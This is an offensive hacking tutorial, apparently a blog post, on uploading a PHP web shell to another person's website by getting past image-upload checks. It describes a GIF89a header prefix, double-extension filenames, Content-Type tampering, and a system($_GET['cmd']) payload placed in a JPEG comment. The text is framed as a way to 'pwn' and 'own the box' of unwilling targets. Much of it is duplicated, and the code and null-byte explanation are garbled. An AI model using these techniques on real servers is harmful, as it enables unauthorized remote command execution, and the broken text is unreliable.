This is the tutorial on uploading shell by bypassing the upload image script!!
So someone you want to pwn has got a nice little option on there website to upload a image. Instead were going to try to upload some php code so we can eventually own the box.
The following are ways to do this
Firstly Just try to upload the shell if this doesn't work add add GIF89a; to the top of your shell.php example:
GIF89a;
Depending on what kind of file validation they are using this may fool the Server Into thinking its a image since when it reads the file it finds the GIF header and assumes its safe since its a Image.
The next way is to rename your shell to shell.php.jpg and trying to upload. This works because the is a null byte and the server should drop it and anything after it but when you upload, it reads it as a .jpg and not a .php.
Another way you can fool the web server into thinking your uploading a image instead of a php shell is to get Firefox and install the tamperdata Add on then click start tamper and upload your php shell then tamper the data and change the content-Type from 'application/octet-stream' to 'image/jpeg'.
^ self explanatory.
The Final way im going to discuss is somewhat good.
Find yourself a copy of edjpgcom.exe
"edjpgcom is a free Windows application that allows you to change (or
add) a JPEG comment in a JPEG file."
Usage:
--
edjpgcom "filename.jpg"
Now add this to the jpg comment since you wont be able to drop a whole shell in there due to limits etc.
";
system($_GET['cmd']);
echo "
So someone you want to pwn has got a nice little option on there website to upload a image. Instead were going to try to upload some php code so we can eventually own the box.
The following are ways to do this
Firstly Just try to upload the shell if this doesn't work add add GIF89a; to the top of your shell.php example:
GIF89a;
Depending on what kind of file validation they are using this may fool the Server Into thinking its a image since when it reads the file it finds the GIF header and assumes its safe since its a Image.
The next way is to rename your shell to shell.php.jpg and trying to upload. This works because the is a null byte and the server should drop it and anything after it but when you upload, it reads it as a .jpg and not a .php.
Another way you can fool the web server into thinking your uploading a image instead of a php shell is to get Firefox and install the tamperdata Add on then click start tamper and upload your php shell then tamper the data and change the content-Type from 'application/octet-stream' to 'image/jpeg'.
^ self explanatory.
The Final way im going to discuss is somewhat good.
Find yourself a copy of edjpgcom.exe
"edjpgcom is a free Windows application that allows you to change (or
add) a JPEG comment in a JPEG file."
Usage:
--
edjpgcom "filename.jpg"
Now add this to the jpg comment since you wont be able to drop a whole shell in there due to limits etc.
";
system($_GET['cmd']);
echo "
"; ?> now rename your jpg to .php and upload. This works since the jpeg and all its attributes are still intact and it seems like a normal jpg to the server. You can try and combine these techniques
Post a Comment